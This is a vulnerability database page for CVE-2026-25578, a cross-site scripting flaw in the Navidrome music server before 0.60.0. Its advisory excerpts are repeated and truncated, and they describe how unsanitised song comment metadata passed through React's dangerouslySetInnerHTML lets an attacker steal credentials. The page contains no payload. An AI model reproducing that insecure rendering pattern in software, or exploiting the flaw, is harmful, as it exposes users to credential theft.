CVE-2026-25578
published 2026-02-04CVE-2026-25578: Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend…
PriorityP429medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EPSS
0.30%
21.3th percentile
Navidrome is an open source web-based music collection server and streamer. Prior to version 0.60.0, a cross-site scripting vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials. This issue has been patched in version 0.60.0.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | navidrome_navidrome | >= 0 < 0.60.0 | 0.60.0 |
| navidrome | navidrome | < 0.60.0 | 0.60.0 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Navidrome has XSS via comment from song metadata in github.com/navidrome/navidrome
osv·2026-02-05
CVE-2026-25578 Navidrome has XSS via comment from song metadata in github.com/navidrome/navidrome
Navidrome has XSS via comment from song metadata in github.com/navidrome/navidrome
Navidrome has XSS via comment from song metadata in github.com/navidrome/navidrome
GHSA
Navidrome has XSS via comment from song metadata
ghsa·2026-02-04
CVE-2026-25578 [MEDIUM] CWE-79 Navidrome has XSS via comment from song metadata
Navidrome has XSS via comment from song metadata
### Summary
An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.
An attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.
### Details
The frontend is using React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.
In some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.
In `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property.
```js
```
This compo
OSV
Navidrome has XSS via comment from song metadata
osv·2026-02-04
CVE-2026-25578 [MEDIUM] Navidrome has XSS via comment from song metadata
Navidrome has XSS via comment from song metadata
### Summary
An XSS vulnerability in the frontend allows a malicious attacker to inject code through the comment metadata of a song to exfiltrate user credentials.
An attacker's maliciously crafted song has to be added to Navidrome to exploit the vulnerability.
### Details
The frontend is using React. In various places, the code uses the `dangerouslySetInnerHTML` escape hatch to set the content of an HTML element.
In some places, the value is first sanitized by removing anything looking like an HTML tag. In at least one place the value is used as is, thus leading to the XSS vulnerability.
In `MultiLineTextField` component, the input is split into lines and rendered through the `dangerouslySetInnerHTML` property.
```js
```
This compo
No detection rules found.
No public exploits indexed.
2026-02-04
Published